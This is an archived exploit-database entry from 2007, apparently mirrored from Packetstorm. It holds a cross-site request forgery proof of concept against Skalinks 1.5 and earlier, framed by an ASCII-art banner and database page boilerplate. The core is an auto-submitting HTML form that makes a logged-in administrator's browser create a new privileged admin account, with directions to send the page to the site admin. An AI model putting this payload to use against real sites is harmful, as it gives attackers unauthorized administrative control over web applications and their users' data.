Lucene search
K

skalinks-csrf.txt

🗓️ 05 Nov 2007 00:00:00Reported by VincyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

skalinks csrf exploit to add admin through HTML for

Code
`##########################################################################  
# _ _ _ _ _____ _ _ #  
# | | | | | | (_) |_ _| (_) | | #  
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #  
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #  
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #  
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #  
# __/ | #  
# |___/ #  
#________________________________________________________________________#  
| |  
| Site: www.hackinginside.altervista.org |  
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |  
| Author: Vincy |  
| Email: [email protected] |  
|________________________________________________________________________|  
  
This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info.  
It work only if admin's logged.  
  
-------------------------------------------------------------------------------------------  
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">  
<input type="text" name="admin_name" value="[ NOME ]">  
<input type="text" name="admin_password" value="[ PASSWORD ]">  
<input type="text" name="admin_email" value="[ EMAIL ]">  
<select name="admin_type"><option value="2">Super Editor</option></select>  
<input type=hidden name="Add_admin" value="Add Admin">  
</form>  
<script>document.add_admin.submit()</script>  
-------------------------------------------------------------------------------------------  
  
# Vincy - Hacking Inside Crew  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4
27